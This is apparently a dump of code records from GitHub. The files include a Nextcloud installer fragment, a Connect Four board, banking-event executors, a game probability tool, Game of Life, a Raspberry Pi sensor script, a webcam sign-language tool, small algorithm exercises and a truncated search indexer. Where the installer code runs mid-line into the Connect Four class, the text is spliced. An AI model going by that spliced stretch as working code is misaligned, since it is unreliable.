_occ_cmd(self, cmd, require_zero_result=True):\n \"\"\"\n Calls OCC command, returns ret, out, err\n :param cmd: \n :return: \n \"\"\"\n cmd = 'sudo -u %s php occ %s ' % (self.user, cmd)\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, cwd=self.webroot)\n if require_zero_result and ret != 0:\n raise errors.SetupError('OCC call failed')\n\n return ret, out, err\n\n def _occ_install(self):\n \"\"\"\n Owncloud installer script\n :return: \n \"\"\"\n admin_pass = util.random_password(14)\n self.config.nextcloud_admin_pass = admin_pass\n self.audit.add_secrets(admin_pass)\n\n # drop previous database before installation\n self.mysql.drop_database('owncloud')\n\n # install with OCC cmd\n cmd = 'maintenance:install ' \\\n ' --database mysql --database-name owncloud --database-user root --database-pass %s ' \\\n ' --admin-user admin --admin-pass %s' % (self.mysql.get_root_password(), admin_pass)\n self._occ_cmd(cmd)\n\n def _occ_set_config(self, app, key, value):\n \"\"\"\n Sets OCC 
config value\n :param key: \n :param value: \n :return: \n \"\"\"\n cmd = 'config:app:set --value %s %s %s' \\\n % (util.escape_shell(value), util.escape_shell(app), util.escape_shell(key))\n self._occ_cmd(cmd)\n\n def _occ_get_config(self, app, key):\n \"\"\"\n Gets OCC config value\n :param key: \n :return: \n \"\"\"\n cmd = 'config:app:get %s %s' % (util.escape_shell(app), util.escape_shell(key))\n ret, out, err = self._occ_cmd(cmd, require_zero_result=False)\n if ret != 0:\n return None\n return out.strip()\n\n def _trusted_domains(self):\n \"\"\"\n Trusted domains configuration - modifies config.php and adds current domain to the trusted_domains config key\n :return: \n \"\"\"\n cfg_path = os.path.join(self.webroot, 'config', 'config.php')\n if not os.path.exists(cfg_path):\n logger.warning('NextCloud config file not found: %s' % cfg_path)\n raise errors.SetupError('NextCloud config file not found')\n\n tpl_file = self._get_php_trusted_domains_template()\n tpl_file = tpl_file.replace('{{ CONFIG_FILE }}', cfg_path)\n tpl_file = re.sub(r'\\{\\{\\s*[a-zA-Z0-9_\\-]+\\s*\\}\\}', '', tpl_file)\n\n php_file = os.path.join(self.webroot, 'ebstall-config.php')\n util.safely_remove(php_file)\n with util.safe_open(php_file, 'w', 0o755) as fw:\n fw.write(tpl_file)\n\n domains_list = ' '.join(self.get_domains() + [self.hostname])\n cmd = 'sudo -u %s php %s %s ' \\\n % (self.user, php_file, domains_list)\n\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, cwd=self.webroot)\n if ret != 0:\n raise errors.SetupError('Owner change failed for private space web')\n\n if isinstance(out, types.ListType):\n out = ''.join(out)\n\n new_cfg = '= 0 and col < self.width)\n \n row = 0\n while self.slots[row][col] == ' ' and row < self.height - 1:\n if self.slots[row + 1][col] == ' ': \n row += 1\n else:\n break\n \n self.slots[row][col] = checker\n \n def reset(self):\n \"\"\" resets the Board object self by setting\n all slots to contain a space character\n \"\"\"\n self.__init__(self.height, self.width)\n \n def add_checkers(self, colnums):\n \"\"\" takes a string of column numbers and places alternating\n checkers in those columns of the called Board object,\n starting with 'X'.\n input: colnums is a string of valid column numbers\n \"\"\"\n checker = 'X' # start by playing 'X'\n\n for col_str in colnums:\n col = int(col_str)\n if 0 <= col < self.width:\n self.add_checker(checker, col)\n\n if checker == 'X':\n checker = 'O'\n else:\n checker = 'X'\n\n def can_add_to(self, col):\n \"\"\" checks if it is valid to place a checker\n in column col on the Board object self\n \"\"\"\n if col >= 0 and col < self.width:\n if self.slots[0][col] == ' ':\n return True\n return False\n \n def is_full(self):\n \"\"\" checks if the Board object self is completely full\n \"\"\"\n for col in range(self.width):\n if self.can_add_to(col) == True:\n return False\n \n return True\n \n def remove_checker(self, col):\n \"\"\" removes the top checker from column col of the Board object self\n \"\"\"\n top = 0\n for row in range(self.height):\n if self.slots[row][col] != ' ':\n top = row\n break\n \n self.slots[top][col] = ' '\n \n def is_horizontal_win(self, checker):\n \"\"\" Checks for a horizontal win for the specified checker\n \"\"\"\n for row in range(self.height):\n for col in range(self.width - 3):\n if self.slots[row][col] == checker and \\\n self.slots[row][col + 1] == checker and \\\n self.slots[row][col + 2] == checker and \\\n self.slots[row][col + 3] == checker:\n return True\n\n return False\n \n def 
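On the `_occ_cmd` and `_occ_set_config` plumbing above: the repo quotes shell arguments with its own `util.escape_shell`; the stdlib equivalent is `shlex.quote`. A sketch that builds the same style of occ command line (illustrative only, not the repo's helper):

import shlex

def occ_command(user, *args):
    # Quote every token so spaces/quotes in values cannot break the shell.
    parts = ["sudo", "-u", user, "php", "occ", *args]
    return " ".join(shlex.quote(p) for p in parts)

print(occ_command("nginx", "config:app:set", "--value", "it's on", "ojsxc", "key"))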
is_vertical_win(self, checker):\n \"\"\" Checks for a vertical win for the specified checker\n \"\"\"\n for row in range(self.height - 3):\n for col in range(self.width):\n if self.slots[row][col] == checker and \\\n self.slots[row + 1][col] == checker and \\\n self.slots[row + 2][col] == checker and \\\n self.slots[row + 3][col] == checker:\n return True\n\n return False \n \n def is_down_diagonal_win(self, checker):\n \"\"\" Checks for a downward diagonal win for the specified checker\n \"\"\"\n for row in range(self.height - 3):\n for col in range(self.width - 3):\n if self.slots[row][col] == checker and \\\n self.slots[row + 1][col + 1] == checker and \\\n self.slots[row + 2][col + 2] == checker and \\\n self.slots[row + 3][col + 3] == checker:\n return True\n\n return False\n \n def is_up_diagonal_win(self, checker):\n \"\"\" Checks for an upward diagonal win for the specified checker\n \"\"\"\n for row in range(self.height - 3, self.height):\n for col in range(self.width - 3):\n if self.slots[row][col] == checker and \\\n self.slots[row - 1][col + 1] == checker and \\\n self.slots[row - 2][col + 2] == checker and \\\n self.slots[row - 3][col + 3] == checker:\n return True\n\n return False\n \n def is_win_for(self, checker):\n \"\"\" returns True if there are four consecutive slots\n containing checker on the Board object self\n \"\"\"\n assert(checker == 'X' or checker == 'O')\n \n if self.is_horizontal_win(checker) == True or \\\n self.is_vertical_win(checker) == True or \\\n self.is_down_diagonal_win(checker) == True or \\\n self.is_up_diagonal_win(checker) == True:\n return True\n return False\n ","repo_name":"munirsidd/connect-four","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14011291303","text":"from miniagent import configure\nfrom miniagent.executer import ExecuterInterface\nfrom miniagent.adapters.rest_caller import RESTCaller\nfrom miniagent.adapters.opensearch_caller import OpensearchCaller\n\nclass Summation(ExecuterInterface):\n\n def _parcer(self, response):\n q = response.get('aggregations').get('deposit_account_grp').get('buckets')\n \n qq = [ {\n \"account\":row['key'], \n \"count\":row['doc_count'], \n \"amount_sum\":row['amount_sum']['value']\n } for row in q]\n\n return {\"results\":qq}\n\n def execute_command(self, \n initial_param: dict,\n os_caller: OpensearchCaller,\n ) -> tuple[int, dict]:\n \n url = \"http://\"+configure.get('ELASTIC_SEARCH_DOMAIN_NAME')\\\n +\":\"+configure.get('ELASTIC_SEARCH_PORT')\n \n index = 'deposit.raffle'\n query =\\\n {\n \"query\": {\n \"match_all\": {}\n },\n \"size\": 0,\n \"aggs\": {\n \"deposit_account_grp\": {\n \"terms\": {\n \"field\": \"account.keyword\"\n },\n \"aggs\": {\n \"amount_sum\": {\n \"sum\": {\n \"field\": \"amount\"\n }\n }\n }\n }\n }\n }\n\n return os_caller.call_get(url, index, query, self._parcer)\n\n\nclass Event(ExecuterInterface):\n\n def execute_command(self, \n initial_param: dict,\n rest_caller: RESTCaller,\n ) -> tuple[int, dict]:\n \n account = configure.get('AGENT_NAME')\n\n url = \"http://\"+configure.get('SERVICE_ENDPOINT').get('raffle')+\"/raffle/all\"\n \n status, result = rest_caller.call_get(url=url)\n\n for row in result.get('results'):\n \n descriptions = dict(\n EVENT_10M_BY_ACCOUNT = \"## {}님의 입금액이 천만원을 넘었습니다. 상금으로 2천만원을 드립니다.\".format(row['account']),\n EVENT_100M = \"## {}님의 입금으로 KDB산업은행 총 입금액이 1억원을 돌파하였습니다. 
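On the connect-four board record above: the four near-identical win checks collapse into one scan over direction vectors. A sketch against the same `slots`/`height`/`width` attributes (the minimal `Board` stub here exists only to make the example runnable):

DIRECTIONS = [(0, 1), (1, 0), (1, 1), (-1, 1)]  # horiz, vert, down-diag, up-diag

class Board:
    def __init__(self, height=6, width=7):
        self.height, self.width = height, width
        self.slots = [[' '] * width for _ in range(height)]

def is_win_for(board, checker):
    for row in range(board.height):
        for col in range(board.width):
            for dr, dc in DIRECTIONS:
                if not (0 <= row + 3 * dr < board.height
                        and 0 <= col + 3 * dc < board.width):
                    continue
                if all(board.slots[row + k * dr][col + k * dc] == checker
                       for k in range(4)):
                    return True
    return False

b = Board()
for c in range(4):
    b.slots[5][c] = 'X'
print(is_win_for(b, 'X'))  # True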
상금으로 2억원을 드립니다.\".format(row['account']),\n EVENT_1M_BY_ACCOUNT = \"## {}님의 입금액이 100만원을 넘었습니다. 상금으로 200만원을 드립니다.\".format(row['account']),\n EVENT_10M = \"## {}님의 입금으로 KDB산업은행 총 입금액이 천만원을 돌파하였습니다. 상금으로 2천만원을 드립니다.\".format(row['account']),\n )\n row.update(dict(\n description = descriptions[row.get('event_id')] if descriptions.get(row.get('event_id')) else \"Expired Event\"\n ))\n\n return status, result\n\nclass CheckEvent(ExecuterInterface):\n\n def execute_command(self, \n initial_param: dict,\n rest_caller: RESTCaller,\n ) -> tuple[int, dict]:\n \n url = \"http://\"+configure.get('SERVICE_ENDPOINT').get('event')+\"/event\"\n \n headers = {}\n if configure.get('C_ROLE'):\n headers.update({'x-role':configure.get('C_ROLE')})\n\n return rest_caller.call_get(url=url, headers=headers)\n \nclass CheckAmount(ExecuterInterface):\n\n def execute_command(self, \n initial_param: dict,\n rest_caller: RESTCaller,\n ) -> tuple[int, dict]:\n\n headers = {}\n if configure.get('C_ROLE'):\n headers.update({'x-role':configure.get('C_ROLE')})\n\n url = \"http://\"+configure.get('SERVICE_ENDPOINT').get('event')+\"/summation\"\n \n return rest_caller.call_get(url=url, headers=headers)","repo_name":"tanminkwan/banking-poc","sub_path":"banking/executer/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2565857775","text":"from itertools import product, repeat, combinations, groupby, accumulate\nfrom fractions import Fraction\nfrom functools import reduce, partial\n\ndef messe(sac, N=4, list_to_print=False, only_print=True, percentage_float=False):\n \"\"\"\n sac : iterable de string contenant tous les membres non moines dans le sac :\n Exemples:\n 'rrb'\n 'r1 r2 b'.split()\n N : nombre de personnes à prendre\n \n list_to_print = True:\n Output : tab, G.\n tab = [['r', 'r', 'b', '-', 53.3] for i in range(G)]\n \n only_print = True:\n Output : None, pretty print to console\n \n only_print = False:\n Output : the pretty string, G\n \n \"\"\"\n sac = list(sac)\n \n placement = '-' * max(map(len,sac))\n \n sac = [placement if all(c == '-' for c in s) else s for s in sac]\n \n D = [placement] * 4 + sac\n \n def special_underscore(string):\n return (0,) if string == placement else (1,string)\n \n L = sorted(map(partial(sorted,key=special_underscore), combinations(D,N)))\n \n G = sorted(\n (\n (sum(1 for u in b), len(L), v)\n for v,b in groupby(L)\n ),\n reverse = True,\n key = lambda t: (t[0], t[2])\n )\n to_percentage = float if percentage_float else int\n \n if list_to_print:\n return [\n v + [to_percentage(float(num) / float(den) * 100)]\n for num, den, v in G\n ], len(G)\n \n widths = (\n max(len(str(num)) for num, den, v in G),\n max(len(str(Fraction(num,den).numerator)) for num, den, v in G),\n max(len(str(Fraction(num,den).denominator)) for num, den, v in G),\n )\n \n format_text = \"| {value} | {pourcent:2}%% | {num:%d}/{den} | {snum:%d}/{sden:%d} |\" % widths\n format_value = \"{:>%d}\" % max(map(len,sac))\n \n res = '\\n'.join(\n format_text.format(\n num = num,\n den = den,\n snum = Fraction(num,den).numerator,\n sden = Fraction(num,den).denominator,\n pourcent = to_percentage(float(num) / float(den) * 100),\n value = ' '.join(map(format_value.format, v))\n )\n for num, den, v in G\n ), len(G)\n \n if only_print:\n print(res[0])\n else:\n return res\n \ndef generate_all():\n colors = 'ABCDEFGHIJ'\n \n def chaine_for_possib(possib):\n '''\n Input: possib (2,1,2,0)\n Output: 
AABCC\n '''\n return ''.join(c * p for c,p in zip(colors, possib))\n \n def n_different(possib):\n '''\n Input: possib (2,1,2,0)\n Output: 3\n '''\n return sum(bool(p) for p in possib)\n \n def filtre(possib):\n # return n_different(possib) in (2,)\n return True\n \n def tri(possib):\n n = n_different(possib)\n \n #return (n, sum(possib))\n \n return (\n max(messe(chaine_for_possib(possib),i,only_print=False)[1] for i in (1,2,3,4)),\n n,\n sum(possib)\n )\n \n if n == 1:\n return (n,)\n else:\n return (1000,sum(possib))\n \n height_head = 1\n height_line = 0.5\n \n affichage = 0\n \n all_choices = product(*repeat(range(5), 4))\n all_choices_set = (tuple(reversed(a)) for a,b in groupby(sorted(map(sorted, all_choices))))\n \n nt = 0\n for possib in sorted(filter(filtre, all_choices_set), key=tri):\n if affichage == 0:\n pretty_possib = ', '.join(\n str(p) + c\n for c,p in zip(colors,possib)\n if p != 0\n )\n print('{} + 4 moines'.format(pretty_possib))\n else:\n pretty_possib = ' '.join(map(str,possib))\n print('\\n# Sac : {} + 4 moines #\\n'.format(pretty_possib))\n \n nt += height_head\n \n n = 0\n saves = []\n for i in (1,2,3,4):\n text, m = messe(\n chaine_for_possib(possib),\n i,\n list_to_print = affichage == 0,\n only_print=False\n )\n saves.append(text)\n if affichage == 1:\n print(\"+ {}\\n{}\\n\".format(i, text))\n n = max(n,m)\n \n nt += n * height_line\n \n if affichage == 0:\n print('\\n'.join(\n ';'.join(reduce(\n lambda x,y: x+y,\n (\n saves[j][i][:-1] + [str(saves[j][i][-1]) + '%']\n if i in range(len(saves[j]))\n else [''] * len(saves[j][0])\n for j in range(len(saves))\n )\n ))\n for i in range(n)\n ))\n \n if affichage in (1,2):\n print(n, 'lignes')\n if affichage in (1,2,3):\n print(nt, 'cm')\n\ndef get_binary_proba(my_mepples, other_meeples, number_to_take):\n ''' len(return) == min(N,i)'''\n return list(reversed(\n list(map(int, accumulate(\n (lambda L:L[:-1])(list(map(lambda x: x[-1],\n sorted(messe('a' * my_mepples + '-' * other_meeples, number_to_take, True, True, True)[0],\n key=lambda l:l.count('a'),\n reverse=True)\n )))\n )))\n ))\n\ndef generate_all_binary(M=15):\n for i in (1,2,3,4):\n for o in range(M+1):\n ligne = []\n for N in (4,3,2,1):\n ligne += get_binary_proba(i, o, N) + ['|']\n print(';'.join(map(str,ligne)))\n\nimport sys\n\nif __name__ == '__main__':\n if 'generate' in sys.argv:\n generate_all()\n else:\n print(\"Examples of bag:\\n rrb\\n r1 r2 b\\n r--\")\n while True:\n try:\n string = input('Bag ? ').strip()\n N = int(input('Number ? '))\n if ' ' in string:\n messe(string.split(), N)\n else:\n messe(string, N)\n except ValueError:\n pass\n\n# messe('r1 r2 b'.split(), 2)\n# for i in (1,2,3,4): messe('r' * 5, i)\n# generate_all()","repo_name":"robertvandeneynde/python","sub_path":"gameutils/descendance.py","file_name":"descendance.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"41419133815","text":"\"\"\"Conway's Game of Life, by Al Sweigart al@inventwithpython.com\nThe classic cellular automata simulation. Press Ctrl-C to stop.\nMore info at: https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\nThis code is available at https://nostarch.com/big-book-small-python-programming\nTags: short, artistic, simulation\"\"\"\n\nimport copy, random, sys, time\n\n# 상수 설정:\nWIDTH = 79 # 셀 그리드의 폭\nHEIGHT = 20 # 셀 그리드의 높이\n\n# (!) ALIVE의 값을 '#'이나 다른 문자로 바꿔 보자:\nALIVE = 'O' # 살아 있는 셀을 나타내는 문자\n# (!) 
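On the `descendance.py` record above: enumerating `combinations` of the bag and grouping yields exact draw probabilities; for the two-kind case that `get_binary_proba` handles, the closed form is the hypergeometric distribution. A sketch with `math.comb` and `Fraction` (this abstracts away the four monk placeholders the record adds to the bag):

from fractions import Fraction
from math import comb

def p_at_least(k, mine, others, draws):
    # P(at least k of my `mine` tokens appear when `draws` are taken
    # without replacement from mine + others tokens).
    num = sum(comb(mine, j) * comb(others, draws - j)
              for j in range(k, min(mine, draws) + 1)
              if 0 <= draws - j <= others)
    return Fraction(num, comb(mine + others, draws))

print(p_at_least(1, 2, 5, 4))  # 6/7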
DEAD의 값을 '.'이나 다른 문자로 바꿔 보자:\nDEAD = ' ' # 죽어 있는 셀을 나타내는 문자\n\n# (!) ALIVE를 '|'로 DEAD를 '-'로 바꿔 보자.\n\n# cells와 nextCells는 상태에 대한 값을 가지고 있는 딕셔너리다.\n# 키는 (x, y) 튜플이며,\n# 값은 ALIVE 또는 DEAD 값 중 하나다.\nnextCells = {}\n# nextCells에 DEAD와 ALIVE를 무작위로 넣는다:\nfor x in range(WIDTH): # 모든 행에 대해 루프를 돈다.\n for y in range(HEIGHT): # 모든 열에 대해 루프를 돈다.\n # DEAD나 ALIVE가 될 확률은 50퍼센트다.\n if random.randint(0, 1) == 0:\n nextCells[(x, y)] = ALIVE # ALIVE를 추가한다.\n else:\n nextCells[(x, y)] = DEAD # DEAD를 추가한다.\n\nwhile True: # 프로그램의 메인 루프\n # 이 루프에서의 반복은 시뮬레이션의 단계다.\n\n print('\\n' * 50) # 각 단계를 개행 문자로 구분한다.\n cells = copy.deepcopy(nextCells)\n\n # 모든 셀을 화면에 출력한다:\n for y in range(HEIGHT):\n for x in range(WIDTH):\n print(cells[(x, y)], end='') # 문자 또는 공백을 출력한다.\n print() # 한 행의 모든 열을 출력했다면 개행한다.\n print('Press Ctrl-C to quit.')\n\n # 현재 단계의 셀을 바탕으로 다음 단계의 셀을 계산한다:\n for x in range(WIDTH):\n for y in range(HEIGHT):\n # (x, y)의 주변 좌표를 가져온다.\n # 가장자리는 서로 연결되어 있다.\n left = (x - 1) % WIDTH\n right = (x + 1) % WIDTH\n above = (y - 1) % HEIGHT\n below = (y + 1) % HEIGHT\n\n # 주변에 살아 있는 셀을 센다:\n numNeighbors = 0\n if cells[(left, above)] == ALIVE:\n numNeighbors += 1 # 왼쪽-상단 셀은 살아 있다.\n if cells[(x, above)] == ALIVE:\n numNeighbors += 1 # 상단 셀은 살아 있다.\n if cells[(right, above)] == ALIVE:\n numNeighbors += 1 # 오른쪽-상단 셀은 살아 있다.\n if cells[(left, y)] == ALIVE:\n numNeighbors += 1 # 왼쪽 셀은 살아 있다.\n if cells[(right, y)] == ALIVE:\n numNeighbors += 1 # 오른쪽 셀은 살아 있다.\n if cells[(left, below)] == ALIVE:\n numNeighbors += 1 # 왼쪽-하단 셀은 살아 있다.\n if cells[(x, below)] == ALIVE:\n numNeighbors += 1 # 하단 셀은 살아 있다.\n if cells[(right, below)] == ALIVE:\n numNeighbors += 1 # 오른쪽-하단 셀은 살아 있다.\n\n # 콘웨이의 라이프 게임 규칙을 기반으로 셀을 설정한다:\n if cells[(x, y)] == ALIVE and (numNeighbors == 2\n or numNeighbors == 3):\n # 현재 셀이 살아 있으면서 주변에 살아 있는 셀이 2 또는 3이면, 다음 단계에서도 살아 있는 셀이 된다:\n nextCells[(x, y)] = ALIVE\n elif cells[(x, y)] == DEAD and numNeighbors == 3:\n # 현재 셀이 죽어 있으면서 주변에 살아 있는 셀이 3이면, 다음 단계에서 살아 있는 셀이 된다:\n nextCells[(x, y)] = ALIVE\n else:\n # 그 외의 모든 셀은 죽은 상태가 된다:\n nextCells[(x, y)] = DEAD\n\n try:\n time.sleep(1) # 1초 동안 일시 중지하여 출력된 것을 확인할 수 있게 한다.\n except KeyboardInterrupt:\n print(\"Conway's Game of Life\")\n print('By Al Sweigart al@inventwithpython.com')\n sys.exit() # Ctrl-C가 눌리면 프로그램을 종료한다.\n","repo_name":"Jpub/PyProject","sub_path":"conwaysgameoflife.py","file_name":"conwaysgameoflife.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"11106462627","text":"import RPi.GPIO as GPIO\nimport time\nimport logging\nimport api\nimport os\nimport util\n\nLAST_MOVEMENT=0\nLAST_API_CALL=0\n\nSENSOR_PIN=0\nRED_PIN=0\nYELLOW_PIN=0\nGREEN_PIN=0\n\ndef eventRegistered(channel):\n logging.debug(\"New Callback\")\n api.setStatusOpen()\n GPIO.output(GREEN_PIN,GPIO.HIGH)\n GPIO.output(RED_PIN, GPIO.LOW)\n GPIO.output(YELLOW_PIN, GPIO.LOW)\n global LAST_MOVEMENT\n LAST_MOVEMENT=util.getCurrentTime()\n logging.debug(\"Callback finished\")\n\ndef main():\n global SENSOR_PIN\n global RED_PIN\n global YELLOW_PIN\n global GREEN_PIN\n SENSOR_PIN=int(os.environ.get(\"SENSOR_PIN\"))\n RED_PIN=int(os.environ.get(\"RED_PIN\"))\n YELLOW_PIN=int(os.environ.get(\"YELLOW_PIN\"))\n GREEN_PIN=int(os.environ.get(\"GREEN_PIN\"))\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(SENSOR_PIN, GPIO.IN)\n GPIO.setup(RED_PIN, GPIO.OUT)\n GPIO.setup(YELLOW_PIN, GPIO.OUT)\n GPIO.setup(GREEN_PIN, GPIO.OUT)\n try:\n logging.info('Register callback for pin: %s', SENSOR_PIN)\n\n 
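On the Game of Life record above (the comments are Korean; the logic is the standard B3/S23 rule on a wrap-around grid): the eight explicit neighbour checks reduce to a loop over offsets. A sketch using the same toroidal indexing and cell encoding:

OFFSETS = [(dx, dy) for dx in (-1, 0, 1) for dy in (-1, 0, 1) if (dx, dy) != (0, 0)]

def live_neighbors(cells, x, y, width, height, alive='O'):
    # cells maps (x, y) -> 'O' or ' '; coordinates wrap at the edges.
    return sum(cells[((x + dx) % width, (y + dy) % height)] == alive
               for dx, dy in OFFSETS)

cells = {(x, y): ' ' for x in range(5) for y in range(5)}
cells[(1, 1)] = cells[(2, 1)] = cells[(1, 2)] = 'O'
print(live_neighbors(cells, 2, 2, 5, 5))  # 3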
GPIO.output(YELLOW_PIN,GPIO.HIGH)\n GPIO.output(RED_PIN, GPIO.LOW)\n GPIO.output(GREEN_PIN, GPIO.LOW)\n\n GPIO.add_event_detect(SENSOR_PIN, GPIO.RISING, callback=eventRegistered)\n\n while True:\n logging.debug(\"Sleep 60 seconds\")\n time.sleep(60)\n\n global LAST_MOVEMENT\n if(util.timestampIsOlderThanTwoMinutes(LAST_MOVEMENT)):\n logging.debug(\"TimeStamp older than two minutes\")\n GPIO.output(RED_PIN,GPIO.HIGH)\n GPIO.output(GREEN_PIN, GPIO.LOW)\n GPIO.output(YELLOW_PIN, GPIO.LOW)\n api.setStatusClose()\n\n except KeyboardInterrupt:\n logging.info(\"Close Application...!\")\n GPIO.cleanup()\n","repo_name":"roscha444/fsr-status-pi","sub_path":"src/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14783254088","text":"#Import Lib\nimport os\nimport cv2\nimport live_predictor\n# for frame rate\nimport time\n\n#------------------(Functions)----------------------#\n\n#greyscale images func Input(img.jpg) --> output(img.jpg)\ndef greyScale(img):\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n#Create folder to save images to and saves directory\ndef createDir(letter: chr):\n #get directory of python file and add directory of the letter folder\n dir = os.getcwd()\n newDir = \"LetterData\\\\\" + letter\n dir = os.path.join(dir, newDir)\n\n #try creating the folder if it doent already exist\n try:\n if not os.path.exists(dir):\n os.makedirs(dir)\n except OSError:\n print(\"Error creating directory\" + dir)\n \n return dir\n\n\n#video Feed\n# if path == \"\" or scTime == 0 then frames will not be saved\ndef openVideo(path : str=\"\", scTime : int=0, make_predictions: bool=True):\n capture_mode = False if path == \"\" or scTime == 0 else True\n\n # logic for live language recognition\n sign_language_model = live_predictor.live_asl_model()\n \n # open webcam\n cap = cv2.VideoCapture(0)\n\n imgCnt = 0\n timmer = 0\n\n # frame rate\n curr_time = time.time()\n while(True):\n timmer += 1\n # Capture the video frame\n success, frame = cap.read()\n if not success:\n print(\"ignoring empty camera frame.\")\n continue\n\n # frame -> cropped image, top predictions, text\n # modify the frame base on which overlays to display\n success, cropped, predictions, text = sign_language_model.process(frame, make_predictions=make_predictions, overlay_bounding_box=True, \n overlay_landmarks=True, top_n=3)\n \n # cv2.imwrite(\"temp_img.png\", cropped) if success else 0\n\n # Display the resulting frame\n cv2.putText(frame, f\"predicted letter: {predictions}\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (209,80,0,255), 2, cv2.LINE_AA)\n cv2.putText(frame, f\"current text: {text}\", (50,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (209,80,0,255), 2, cv2.LINE_AA)\n cv2.putText(frame, f\"frame rate: {1 / (time.time() - curr_time)}\", (50,150), cv2.FONT_HERSHEY_SIMPLEX, 1, (209,80,0,255), 2, cv2.LINE_AA)\n cv2.imshow('frame', frame)\n # cv2.displayOverlay('frame', f\"predicted letter: {predictions}\")\n # the overlay could include more information\n # the openVideo function could take in some more parameters, giving the option to show more data on overlay\n\n # print text to console\n os.system(\"cls\")\n print(f\"predicted letter: {predictions}\")\n print(\"current text:\\n\", text)\n print(f\"frame rate: {1 / (time.time() - curr_time)}\")\n curr_time = time.time()\n\n # hotkey assignment\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n elif capture_mode and timmer % scTime == 0:\n imgName = 
f\"{imgCnt}.png\"\n cv2.imwrite(os.path.join(path, imgName), cropped if success else frame)\n imgCnt += 1\n\n if cv2.waitKey(1) & 0xFF == ord('c'):\n sign_language_model.text_prediction.reset()\n \n \n # After the loop release the cap object\n cap.release()\n\n #Destroy all the windows\n cv2.destroyAllWindows()\n\n#--------------------(Main)-------------------------#\ndef main():\n dir = createDir('c')\n openVideo(dir, 150, make_predictions=False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"hendrixgg/qmind-SLR2","sub_path":"WebCam.py","file_name":"WebCam.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35587980466","text":"import sys\ninput = sys.stdin.readline\n\nt = int(input())\nfor _ in range(t):\n\n n = int(input())\n\n fivo = [0,1]\n for i in range(2,50):\n fivo.append(fivo[i-1] + fivo[i-2])\n\n answer = []\n while n:\n for i in range(len(fivo)):\n if n >= fivo[i]: \n temp = fivo[i] \n \n n = n - temp\n answer.append(temp)\n \n answer.sort() \n for i in answer:\n print(i, end = \" \")\n \n \n\n\n\n\n\n\n","repo_name":"agilestar8/coding-test-","sub_path":"baekjoon/그리디 알고리즘/9009.py","file_name":"9009.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20051643364","text":"def next_alpha(arr, x):\n n = len(arr)\n res = None\n l, r = 0, n-1\n while l <= r:\n mid = l + (r-l)//2\n if arr[mid] < x:\n l = mid + 1\n else:\n res = arr[mid]\n r = mid - 1\n return res\n","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"Binary_search/Easy/Next Alphabetical Element.py","file_name":"Next Alphabetical Element.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70275559210","text":"\n#!/usr/bin/python\nimport xml.sax\nimport nltk,sys,time\nimport timeit\nfrom nltk.stem import PorterStemmer\nfrom collections import defaultdict\nfrom operator import itemgetter\n#nltk.download('corpus')\n#from nltk.corpus import wordnet\nimport re\nimport json\nfrom itertools import izip\nfrom heapq import heapify, heappush, heappop\nimport os\n\n\nstart = timeit.default_timer()\nfolder = \"final_index/\"\nindexFileCount = 0\nsecondaryIndex = dict()\nchunksize = 100000\n\ndef writeToPrimary():\n global folder\n global globalDict\n global indexFileCount\n offset = []\n firstWord = True\n indexFileCount += 1\n filename = folder+\"index\"+str(indexFileCount)+\".txt\"\n fp = open(filename,'wb')\n for i in sorted(globalDict):\n if firstWord:\n secondaryIndex[i] = indexFileCount\n firstWord = False\n toWrite = str(i)+\"=\"+globalDict[i]+\"\\n\"\n fp.write(toWrite)\n\ndef writeToSecondary():\n global secondaryIndex\n filename = folder+\"Secondary_Index.txt\"\n fp = open(filename,'wb')\n for i in sorted(secondaryIndex):\n tmp = str(i)+\" \"+str(secondaryIndex[i])+\"\\n\"\n fp.write(tmp)\n\n\nimport glob\nfiles = glob.glob('/Users/jayant/ire mini project/wiki_search_engine/20162073/created_files/*')\nprimary_index = open('/Users/jayant/ire mini project/wiki_search_engine/20162073/primary_index.txt','a')\n\n\ncompletedFile = [0]*len(files)\nfilePointers = dict()\ncurrentRowOfFile = dict()\npercolator = list()\nwords = dict()\ntotal = 0\nglobalDict = defaultdict()\n\nfor i in range(len(files)):\n completedFile[i] = 1;\n filePointers[i] = open(files[i],'r')\n currentRowOfFile[i] = filePointers[i].readline()\n 
